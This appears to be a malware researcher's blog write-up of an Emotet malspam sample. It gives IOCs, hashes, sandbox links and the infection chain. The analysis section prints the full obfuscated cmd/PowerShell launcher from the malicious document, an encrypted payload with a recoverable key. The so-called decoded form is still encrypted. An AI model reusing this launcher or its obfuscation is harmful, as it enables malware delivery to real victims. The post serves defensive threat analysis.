A quick post today for some more emotet malspam that I was able to find. Nothing really special about this one with the exception of it using punycode for the URL. Outside of that, this is pretty much the standard old emotet infection that most have seen. I did notice though that my run of the maldoc and the run used within Any.Run resulted in somewhat a different chain. Maybe the difference between Windows 7 x32 and x64 bit. At this time I am not sure.
As usual, artifacts and such can be found via my repo here.
IOCs:
=====
78.109.16.225 / hxxp://electro-dom.od.ua/ (GET /rzhN/)
103.233.58.6 (encrypted POST)
*Other domains from maldoc*
hxxp://bigtime-xl.com/Mmr1Ev5/
hxxp://vellstore.ru/vXQJu6/
hxxp://midnightdjs.com.au/upGG/
hxxp://souz-rti.ru/KwzLDvH/
Artifacts:
==========
File name: 932-66-888068-336 & 932-66-888068-967.doc
File size: 252KB
File path: NA
MD5 hash: 1b599500aa99378cd37f63f0a78dd480
Virustotal: http://www.virustotal.com/#/file/a6116a475276f54b7d36b49fd42ba78b739443f8dd0bb2825440357d56025497/community
Detection ratio: 9 / 59
First Detected: 2018-03-09 15:15:42
Hybrid Analysis: http://www.hybrid-analysis.com/sample/a6116a475276f54b7d36b49fd42ba78b739443f8dd0bb2825440357d56025497?environmentId=100
Any.Run: http://app.any.run/tasks/4c731dc9-5e8b-433c-aaca-3c4280652ac9
File name: wlanwin.exe
File size: 110KB
File path: C:\Users\%username%\AppData\Local\Microsoft\Windows
MD5 hash: 6fcf18998001fa2186de3437db37da17
Virustotal: http://www.virustotal.com/#/file/a219eca45d933999649b946372869ad39f3ee5229a639baafe75595303e0ed4c/detection
Detection ratio: 19 / 68
First Detected: 2018-03-09 17:35:51
Analysis:
=========
As seen above, this is pretty straight forward. Once the maldoc is run, CMD.exe is run which then proceeds to call Powershell. I was not able to get the script but Any.Run was able to grab that for me. The script looks like this:
"C:\Windows\System32\cmd.exe" zVoSBnj FRmMXVGNAIVQftclDDDiPD sTtMChdLS & %C^om^S^pEc% %C^om^S^pEc% /V /c set %sunBlBEzMwOmFMs%=EaXZXllRJbWcz&&set %iSqdhqvSVLWO%=p&&set %jviYErzBt%=ow&&set %VLHtjFEDNjvzaLM%=bpoLochJIJ&&set %iHFAzUYiKY%=!%iSqdhqvSVLWO%!&&set %GJVsJibBqnHtVHo%=qucZwaZwimhQ&&set %DmsDMwaJWBwDc%=er&&set %hbEjLOzIDtZH%=!%jviYErzBt%!&&set %uiMpvtriNKtoKs%=s&&set %JsdwlawuhUWQYZU%=NhThXEmnhi&&set %SSkocnqomiVv%=he&&set %zMUjTid%=ll&&!%iHFAzUYiKY%!!%hbEjLOzIDtZH%!!%DmsDMwaJWBwDc%!!%uiMpvtriNKtoKs%!!%SSkocnqomiVv%!!%zMUjTid%! "( [rUNTImE.INtEropsErViCEs.MaRsHal]::([ruNtIME.iNTeroPsErViCes.MARShAL].GetmembERs()[5].NaMe).INVoke( [rUNtIME.INTeRopServIcES.mARshAl]::SEcurEStRINgtOBstr( $('76492d1116743f0423413b16050a5345MgB8AGsASgA0ADQARQBGAHIAVwBOAHMARwBvAC8ASABQADYAVgBKAGYAUABJAFEAPQA9AHwAMAA2AGIAYQAyAGEAZgAyADEAMwA4AGQANwAwAGUAMABiAGEAOABmAGYAMwAzAGQAOQAwAGUAMQBmAGMANABmADYAZQAwADMAOABjADYAOABmADkAZQBhAGQAZgBmAGIAYQBjADYAZQAwADAAZAA4AGYAMABlADUANABjAGMANABmADcAYQAyAGYANwBlADEAMwBlAGYAMgAyADQANgA0AGQAOAAwADQANQBkAGMAYgBiAGMAZQBjADgAYQA0ADcAZAA5ADkAMwAzAGIAOAAzAGEAZQA1ADUAMwBlADkAYgBjADkAMABhADMANgAzAGIAYgBmADMAMwBkADcAZQAwADEAZgBkADcAZAA0ADMANwA5ADgANAAwADcANwA5ADYAMQBmAGMANwA3ADkAZAA3AGIAMQBkAGMAZAA3AGEAYwA0ADUANAA1ADEAOAAzADEAMgA4AGMAMQAyADEAMQBhAGIAMgA4AGUAYgA0ADQAOQBjADAAMAAzADIAOQA0ADAAMQAxAGEAOAA1ADkAZgA0ADMAZgAzADYANwBlADgAYgBjAGYANQBlADgAMAA5AGMAZQA3AGEAOAA5AGIAMgA1ADYAMwA1ADkAZAAyADAAMgA4ADkANABlAGQAMwBmADYAMgA2ADcAMQAwAGUAMQBiADEAOAA3ADAAMAA5ADAAZAA1ADIANAA4ADIAOABmADIANAAwADgAOQBmADYAOQBmADgAYwAzADcANgAyADQANgAwADMAOQBiADkANABmADcAYgA3ADUAYQA2ADcAOAAyAGMAMwA0AGUAYwBkAGQAMABmADUANgBmAGEAYwAyADIAMQBiAGQANwA3ADUAMgA5ADEAYwAyADkANwA5ADMAMwA3AGEAZQBjADcAYQAxADIANgA2ADAANQA5AGMANgAxADkAZQAxADcANQAyADYAZQA4ADQAZgAyAGQAOAA5AGIAMgBmAGUAZgA1ADYAMAA3AGIAYQAwADcAMgA5ADQAYwBhAGIANwA4ADcAYwBmADcAZQBiAGEAZgA1AGEANQA2AGYAZAAzADAAOAA0AGMAZgAwADkAOABmAGIAMgA1ADgAMAAwAGUANQBkADkAYwA3ADEAYwA2ADAAYgAwADgAYwBhADYAMgA0ADEAMwAxAGYAYwA0AGIAZABkAGUANQBlADcAMQBhADMAYwBhADIAMQAyAGMANABhAGEAOAA2AGYANAAwADkAOAA1AGIAMQAwADYAOAA5ADkAYQA2ADYAMwBmAGUAOAAzADIAOQA0AGIAZAA2ADEANQBmADAAMwAwADcAMgA0ADUAOABjADEAMAA1ADgANgBhADIAYQBjADkAZgBhADMAYQAxAGQAZAA4ADAAYwAyAGUANQBkAGMAZQAwADUANAAzADQAMAAwAGEANABjADYAZgA2ADAANQA5AGMAYQBiAGQAZQAzADMAZgA4AGUAMAAxAGYAOAA2ADYAMgA2AGUAMwA5ADkAZgBkAGYAMABiAGQAZQA5ADMANwA2ADAAOQBlAGYAZQAzADYANABmAGEANwA3ADcAZQAxADUANQA1ADQANwBjADAAMgBlADEAZQBiADkANwA2ADkANQAwAGMANgAzAGMAZgA2ADMAMgAxAGQAOAAzAGYAYQAwAGEAMwAzAGMANABjAGUAZABlAGYAMAA4AGYAMwAwADAAMABlAGIAYgBmAGYAMwBlAGEANAA2AGQANwAzAGYAMwAwADAAYQAxADcANgA2AGIANQBlADQAOABhADEAOQAxADgAMAAyAGEAMABkADQAMQBjADgANgBiADYANAAyADMAZQBjAGUANQBmAGEAZQBhAGUAMgA4ADEAOQBhADIAOABhADIANQAyADUAMABlAGMANQBlADkANwA1ADgAZAAxADEAMwBmAGYAZgA2AGUANwA5ADIAOQBiADYAMQBlAGUANwBkADMAOABlAGUAZQBjADgANQBiAGUAMQAyAGYANwAzADIAMQBhADEANQAxADMAOAAyADkAMgBlAGMAYQA2ADkANwA4ADQANQAzADUAZgA5ADIAOABkAGYAMABiAGMAYwBlADkAMQA5ADgAYwA1AGIAMwA2AGQANgBiAGUAZQA2AGIAOQBiAGEAZABjADAAYgAzAGUAMwA5ADIAMwA3ADAAMAAwAGMAMwBiADkAYwAxAGYAOABjADYAOABmAGUAZQA1AGYAYQBmAGQAYQA0ADIANgAxADgAZgBmAGUAMQAxAGQAMQA5ADUANgBjADkAYgBlADkAOQBkADUAMgBhADkANQA4ADcANABmADMANAA3AGMAMgAyADQAZgBiADYAOQA1ADAAMAA1AGMANQA2ADMAZgBmAGQANgBiADkANwA3ADQANwBhAGEAMABhAGEAYQA4AGQAMAA1ADEAMgA3ADQAMgAyAGYAMQBkAGEAYwAwADUAMwA4ADcAZQA4ADcAZABiAGUANwBhADQAYgA5AGQAMwAwAGIANwBmADMAZgA1ADkAMgA5ADkANAAyAGYAMAA3AGUANwA2AGQAOQBlADYAYwA5ADEANQAxADIAMABhAGQAOAAzADQANwAzADAAYQAxAGYAZgAzADgAMQA5AGYAMQA5ADQAZABiADYAZQBiAGMAYQBjADUAMgAwADcAMABhADMAZQBlADkAZQA5AGQAMAA0ADcANQBjADcANAA1ADEAYgA0ADUAOABmAGYANAA2ADUAZgAxAGUANgA5ADEAZQBiAGUAYwA0AGQANgAzADkAOABiADIAZAA5AGYAYQA4ADQAZQA1ADAANQA4AGMAMgA1ADAAMQAwAGQAMgBjADYAYgAzAGIANQBkAGUAMwBhADQAYgA2AGEAZgAzADgAYQBiADIAZABmADkAZgA2AGUANwA5AGQANgA4AGEAMABjAGYAZQA2AGEAMgAxADEAOQBkAGYAYQBiADkAOQAyADMANgAzADMAMwBjAGIAOQAwADQAMwA0AGUANQBmAGMAZABiADMAOQBlADAANABkADkAYgA0ADIANgA4ADIAMAA4AGIANQBlADIANwBmAGUAMAA1AGIAZQA0ADgAOAAyAGEAMAA1ADAAMAA2ADQAZgA3ADkAOQA2ADYAZgBlADYAMgBmADMAZgBjAGUANgBmADkAMgAyADcAOABkADUAMgBiAGEAMAA4ADkAYgAxAGEAYgA5ADgAMgA3ADEAYwBiADgAZQA1AGEANgA5ADYAZAA4AGQAYgBlADkAYwBkADUAYQA4ADgAZQAwADYANwAzAGYAZgAyADIANABiADAAMQAwADUAMwA1ADEANQA0AGMANgA2ADkAZgAxADAAMwA3AGIAYwA5AGIANgBiADIAMABhADMAZABkAGQAOAAzAGMANAAyADkAYgA1AGIAOAA0ADgAMQBjADkAZABhADMAYgA0ADMAOABiADYANwBiADYAMQAwADAAZQA5AGMAOQAzADYAOABjADEAMgBiADAAYQA4ADcANwAxADgAZgAzAGQANwAwADcAYgA5ADUAMgBiADYAYwA2ADIAMQAzAGMAMwA0AGIAMgBkADIAMgBiAGMAMQBlAGIANgBhADYAMAAyADAAZgA1ADYAMAA1AGEAYgA4ADcAZQA0ADgAZAA1ADAANwAyAGUAMQAwADQANQAxAGUANQA0ADkANgAzADAAYwA2AGIAZgBiADMAMQBjADEAYgA5ADUAMABlADcANgAyAGIAMgBjAGMANwA5AGMAZQA2AGYAMwBmADIAZgA5ADAAYwA2ADYAYwBjADkANgA5AGIAZgA0ADYAYQA2ADIANAAxADcAYwAwADgAMgA0AGYAMAAwAGUAYgAxADAANgA3ADgANQA0ADkANgA3ADIAOQA1ADYAOQA1ADUAMABlAGQAMQA0AGEAMwBkAGQANgAyADYAMwA0ADkANwAwADUAMQBhADIANABhADEAMABhAGUANQA2AGUANQA4AGIANwBlADIAOQA4ADAAZQA5ADkAMQBjADYAZQAzADQAOQBmADkAMgAzADQANQA4AGYAZQBmADUAYwAzADgAOQBiADAAOQAzAGIANwBiAGIAMQBmADgAZAA5ADUANwBiAGEANQA4ADgANwA3AGEANgA2ADYAMABmADkAYwA5ADIAYwBkADgAZQBlAGYAZAA2ADkAMAAzAGUAOQBjAGQANAAxADgAYgBlADYANAAzAGYAYwA2ADkANgBiADkAMQAyADEAMgBhADQAOABiAGEAMQAwADgAYQBlAGIAZQA0ADQAMQA3AGUAOAAyAGMAZgAyADMAMQA4AGUAZQBmAGUAYwBkAGIAOQBkADUAYwAwADUANAA3AGMAZgA3AGMANAA3AGEAYwA3AGYAOQAwADcAYwA3AGYAMAA1AGEAYQBhAGYANQA2AGEANQA4ADUAYQAxAGEAOQAzAGMAMABmAGEANABlADAAMgA4ADYAYwBlADMAMABmAGIAMwAyADgAMAA1ADAANwA1ADkAZQAyAGYAYQA5AGMAMAAxADIAOQA4ADcAMgBlAGEAZgAxAGQAZQAyADYAZgAwADkAMABkADEANwBjAGEAMQA1ADcAZgA3ADAAMABmADIAZgBjADEAYwAwAGYAYgA0ADYANAA4AGEAMQA2ADYANQAzAGIAMQA5ADEAZQA2ADYANQAyADgAZgA5ADkAMAAwAGIAMwAxADkAMwBhAGEAOAA2ADMAMgA2ADkAOQAwAGEAMAA1ADMAMwA4ADIAZgAxADcAZgBiAGIANgBjADUAYgA0AGEAZgA1ADcAYwA0ADYAYwAxADEANAA2ADYAMgAyADQAZAAxADIANgA0ADUAMgBlAGUAOQA2AGMAYgBjADkAMgAzAGIAMAAzAGUANgA0ADgAYgA2ADkAMwAzADYAZQBkADgAYQA5AGUAYgAzADkAZABhADMANgA5ADgANQBlADEAOQA3AGMAZgAyADgAYwA2ADIANAA3ADkANgA4ADgANwBkADAAZAA4ADkAMABiAGEAOABjADAANAA5AGMAYQA5ADkANABkADMANgBkADcAMQAwAGQAZAA0AGQAZAA0ADcAOABlAGUAZQA5AGYAYwAwADkAZQBjADkAYgBlADEANwA2AGYAMQA4ADkAOAAyADMAZABjADcANgAxAGQAZQBjADUAOQBlADgAYQAyAGIAOABmADQAMAA1ADIAOQAwAGQAOQBhADYAMAA3ADgAOQA5ADcAZQA2ADgAMAA3AGQAMwBjADMANAAxADAAMAA1ADkAYgA2AGMAYQBmAGIAYQAwADcAOABmADIANAA=' |ConVeRTto-SecurestRiNg -KE (32..9))) ) ) |. ((gv '*Mdr*').NaMe[3,11,2]-JOiN'')
which decoded looks like this:
powershell "( [rUNTImE.INtEropsErViCEs.MaRsHal]::([ruNtIME.iNTeroPsErViCes.MARShAL].GetmembERs()[5].NaMe).INVoke( [rUNtIME.INTeRopServIcES.mARshAl]::SEcurEStRINgtOBstr( $('76492d1116743f0423413b16050a5345MgB8AGsASgA0ADQARQBGAHIAVwBOAHMARwBvAC8ASABQADYAVgBKAGYAUABJAFEAPQA9AHwAMAA2AGIAYQAyAGEAZgAyADEAMwA4AGQANwAwAGUAMABiAGEAOABmAGYAMwAzAGQAOQAwAGUAMQBmAGMANABmADYAZQAwADMAOABjADYAOABmADkAZQBhAGQAZgBmAGIAYQBjADYAZQAwADAAZAA4AGYAMABlADUANABjAGMANABmADcAYQAyAGYANwBlADEAMwBlAGYAMgAyADQANgA0AGQAOAAwADQANQBkAGMAYgBiAGMAZQBjADgAYQA0ADcAZAA5ADkAMwAzAGIAOAAzAGEAZQA1ADUAMwBlADkAYgBjADkAMABhADMANgAzAGIAYgBmADMAMwBkADcAZQAwADEAZgBkADcAZAA0ADMANwA5ADgANAAwADcANwA5ADYAMQBmAGMANwA3ADkAZAA3AGIAMQBkAGMAZAA3AGEAYwA0ADUANAA1ADEAOAAzADEAMgA4AGMAMQAyADEAMQBhAGIAMgA4AGUAYgA0ADQAOQBjADAAMAAzADIAOQA0ADAAMQAxAGEAOAA1ADkAZgA0ADMAZgAzADYANwBlADgAYgBjAGYANQBlADgAMAA5AGMAZQA3AGEAOAA5AGIAMgA1ADYAMwA1ADkAZAAyADAAMgA4ADkANABlAGQAMwBmADYAMgA2ADcAMQAwAGUAMQBiADEAOAA3ADAAMAA5ADAAZAA1ADIANAA4ADIAOABmADIANAAwADgAOQBmADYAOQBmADgAYwAzADcANgAyADQANgAwADMAOQBiADkANABmADcAYgA3ADUAYQA2ADcAOAAyAGMAMwA0AGUAYwBkAGQAMABmADUANgBmAGEAYwAyADIAMQBiAGQANwA3ADUAMgA5ADEAYwAyADkANwA5ADMAMwA3AGEAZQBjADcAYQAxADIANgA2ADAANQA5AGMANgAxADkAZQAxADcANQAyADYAZQA4ADQAZgAyAGQAOAA5AGIAMgBmAGUAZgA1ADYAMAA3AGIAYQAwADcAMgA5ADQAYwBhAGIANwA4ADcAYwBmADcAZQBiAGEAZgA1AGEANQA2AGYAZAAzADAAOAA0AGMAZgAwADkAOABmAGIAMgA1ADgAMAAwAGUANQBkADkAYwA3ADEAYwA2ADAAYgAwADgAYwBhADYAMgA0ADEAMwAxAGYAYwA0AGIAZABkAGUANQBlADcAMQBhADMAYwBhADIAMQAyAGMANABhAGEAOAA2AGYANAAwADkAOAA1AGIAMQAwADYAOAA5ADkAYQA2ADYAMwBmAGUAOAAzADIAOQA0AGIAZAA2ADEANQBmADAAMwAwADcAMgA0ADUAOABjADEAMAA1ADgANgBhADIAYQBjADkAZgBhADMAYQAxAGQAZAA4ADAAYwAyAGUANQBkAGMAZQAwADUANAAzADQAMAAwAGEANABjADYAZgA2ADAANQA5AGMAYQBiAGQAZQAzADMAZgA4AGUAMAAxAGYAOAA2ADYAMgA2AGUAMwA5ADkAZgBkAGYAMABiAGQAZQA5ADMANwA2ADAAOQBlAGYAZQAzADYANABmAGEANwA3ADcAZQAxADUANQA1ADQANwBjADAAMgBlADEAZQBiADkANwA2ADkANQAwAGMANgAzAGMAZgA2ADMAMgAxAGQAOAAzAGYAYQAwAGEAMwAzAGMANABjAGUAZABlAGYAMAA4AGYAMwAwADAAMABlAGIAYgBmAGYAMwBlAGEANAA2AGQANwAzAGYAMwAwADAAYQAxADcANgA2AGIANQBlADQAOABhADEAOQAxADgAMAAyAGEAMABkADQAMQBjADgANgBiADYANAAyADMAZQBjAGUANQBmAGEAZQBhAGUAMgA4ADEAOQBhADIAOABhADIANQAyADUAMABlAGMANQBlADkANwA1ADgAZAAxADEAMwBmAGYAZgA2AGUANwA5ADIAOQBiADYAMQBlAGUANwBkADMAOABlAGUAZQBjADgANQBiAGUAMQAyAGYANwAzADIAMQBhADEANQAxADMAOAAyADkAMgBlAGMAYQA2ADkANwA4ADQANQAzADUAZgA5ADIAOABkAGYAMABiAGMAYwBlADkAMQA5ADgAYwA1AGIAMwA2AGQANgBiAGUAZQA2AGIAOQBiAGEAZABjADAAYgAzAGUAMwA5ADIAMwA3ADAAMAAwAGMAMwBiADkAYwAxAGYAOABjADYAOABmAGUAZQA1AGYAYQBmAGQAYQA0ADIANgAxADgAZgBmAGUAMQAxAGQAMQA5ADUANgBjADkAYgBlADkAOQBkADUAMgBhADkANQA4ADcANABmADMANAA3AGMAMgAyADQAZgBiADYAOQA1ADAAMAA1AGMANQA2ADMAZgBmAGQANgBiADkANwA3ADQANwBhAGEAMABhAGEAYQA4AGQAMAA1ADEAMgA3ADQAMgAyAGYAMQBkAGEAYwAwADUAMwA4ADcAZQA4ADcAZABiAGUANwBhADQAYgA5AGQAMwAwAGIANwBmADMAZgA1ADkAMgA5ADkANAAyAGYAMAA3AGUANwA2AGQAOQBlADYAYwA5ADEANQAxADIAMABhAGQAOAAzADQANwAzADAAYQAxAGYAZgAzADgAMQA5AGYAMQA5ADQAZABiADYAZQBiAGMAYQBjADUAMgAwADcAMABhADMAZQBlADkAZQA5AGQAMAA0ADcANQBjADcANAA1ADEAYgA0ADUAOABmAGYANAA2ADUAZgAxAGUANgA5ADEAZQBiAGUAYwA0AGQANgAzADkAOABiADIAZAA5AGYAYQA4ADQAZQA1ADAANQA4AGMAMgA1ADAAMQAwAGQAMgBjADYAYgAzAGIANQBkAGUAMwBhADQAYgA2AGEAZgAzADgAYQBiADIAZABmADkAZgA2AGUANwA5AGQANgA4AGEAMABjAGYAZQA2AGEAMgAxADEAOQBkAGYAYQBiADkAOQAyADMANgAzADMAMwBjAGIAOQAwADQAMwA0AGUANQBmAGMAZABiADMAOQBlADAANABkADkAYgA0ADIANgA4ADIAMAA4AGIANQBlADIANwBmAGUAMAA1AGIAZQA0ADgAOAAyAGEAMAA1ADAAMAA2ADQAZgA3ADkAOQA2ADYAZgBlADYAMgBmADMAZgBjAGUANgBmADkAMgAyADcAOABkADUAMgBiAGEAMAA4ADkAYgAxAGEAYgA5ADgAMgA3ADEAYwBiADgAZQA1AGEANgA5ADYAZAA4AGQAYgBlADkAYwBkADUAYQA4ADgAZQAwADYANwAzAGYAZgAyADIANABiADAAMQAwADUAMwA1ADEANQA0AGMANgA2ADkAZgAxADAAMwA3AGIAYwA5AGIANgBiADIAMABhADMAZABkAGQAOAAzAGMANAAyADkAYgA1AGIAOAA0ADgAMQBjADkAZABhADMAYgA0ADMAOABiADYANwBiADYAMQAwADAAZQA5AGMAOQAzADYAOABjADEAMgBiADAAYQA4ADcANwAxADgAZgAzAGQANwAwADcAYgA5ADUAMgBiADYAYwA2ADIAMQAzAGMAMwA0AGIAMgBkADIAMgBiAGMAMQBlAGIANgBhADYAMAAyADAAZgA1ADYAMAA1AGEAYgA4ADcAZQA0ADgAZAA1ADAANwAyAGUAMQAwADQANQAxAGUANQA0ADkANgAzADAAYwA2AGIAZgBiADMAMQBjADEAYgA5ADUAMABlADcANgAyAGIAMgBjAGMANwA5AGMAZQA2AGYAMwBmADIAZgA5ADAAYwA2ADYAYwBjADkANgA5AGIAZgA0ADYAYQA2ADIANAAxADcAYwAwADgAMgA0AGYAMAAwAGUAYgAxADAANgA3ADgANQA0ADkANgA3ADIAOQA1ADYAOQA1ADUAMABlAGQAMQA0AGEAMwBkAGQANgAyADYAMwA0ADkANwAwADUAMQBhADIANABhADEAMABhAGUANQA2AGUANQA4AGIANwBlADIAOQA4ADAAZQA5ADkAMQBjADYAZQAzADQAOQBmADkAMgAzADQANQA4AGYAZQBmADUAYwAzADgAOQBiADAAOQAzAGIANwBiAGIAMQBmADgAZAA5ADUANwBiAGEANQA4ADgANwA3AGEANgA2ADYAMABmADkAYwA5ADIAYwBkADgAZQBlAGYAZAA2ADkAMAAzAGUAOQBjAGQANAAxADgAYgBlADYANAAzAGYAYwA2ADkANgBiADkAMQAyADEAMgBhADQAOABiAGEAMQAwADgAYQBlAGIAZQA0ADQAMQA3AGUAOAAyAGMAZgAyADMAMQA4AGUAZQBmAGUAYwBkAGIAOQBkADUAYwAwADUANAA3AGMAZgA3AGMANAA3AGEAYwA3AGYAOQAwADcAYwA3AGYAMAA1AGEAYQBhAGYANQA2AGEANQA4ADUAYQAxAGEAOQAzAGMAMABmAGEANABlADAAMgA4ADYAYwBlADMAMABmAGIAMwAyADgAMAA1ADAANwA1ADkAZQAyAGYAYQA5AGMAMAAxADIAOQA4ADcAMgBlAGEAZgAxAGQAZQAyADYAZgAwADkAMABkADEANwBjAGEAMQA1ADcAZgA3ADAAMABmADIAZgBjADEAYwAwAGYAYgA0ADYANAA4AGEAMQA2ADYANQAzAGIAMQA5ADEAZQA2ADYANQAyADgAZgA5ADkAMAAwAGIAMwAxADkAMwBhAGEAOAA2ADMAMgA2ADkAOQAwAGEAMAA1ADMAMwA4ADIAZgAxADcAZgBiAGIANgBjADUAYgA0AGEAZgA1ADcAYwA0ADYAYwAxADEANAA2ADYAMgAyADQAZAAxADIANgA0ADUAMgBlAGUAOQA2AGMAYgBjADkAMgAzAGIAMAAzAGUANgA0ADgAYgA2ADkAMwAzADYAZQBkADgAYQA5AGUAYgAzADkAZABhADMANgA5ADgANQBlADEAOQA3AGMAZgAyADgAYwA2ADIANAA3ADkANgA4ADgANwBkADAAZAA4ADkAMABiAGEAOABjADAANAA5AGMAYQA5ADkANABkADMANgBkADcAMQAwAGQAZAA0AGQAZAA0ADcAOABlAGUAZQA5AGYAYwAwADkAZQBjADkAYgBlADEANwA2AGYAMQA4ADkAOAAyADMAZABjADcANgAxAGQAZQBjADUAOQBlADgAYQAyAGIAOABmADQAMAA1ADIAOQAwAGQAOQBhADYAMAA3ADgAOQA5ADcAZQA2ADgAMAA3AGQAMwBjADMANAAxADAAMAA1ADkAYgA2AGMAYQBmAGIAYQAwADcAOABmADIANAA=' |ConVeRTto-SecurestRiNg -KE (32..9))) ) ) |. ((gv '*Mdr*').NaMe[3,11,2]-JOiN'')
We then see ‘239833.exe’ process start up and create a child process and then that child process creating two more processes that is one of emotet’s calling cards – wlanwin.exe running from the ‘C:\Users\%username%\AppData\Local\Microsoft\Windows’ path. Note that the ‘wlanwin.exe’ process is the same as the ”239833.exe’ process as there is a rename operation called.
Persistence is maintained via the “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” registry key.
I also ran strings2.exe (http://split-code.com/strings2.html) against the running process (PID 2776) to see if I could find anything there. Unfortunately I was not able to really glean much. I have included the strings output so if you find something please let me know.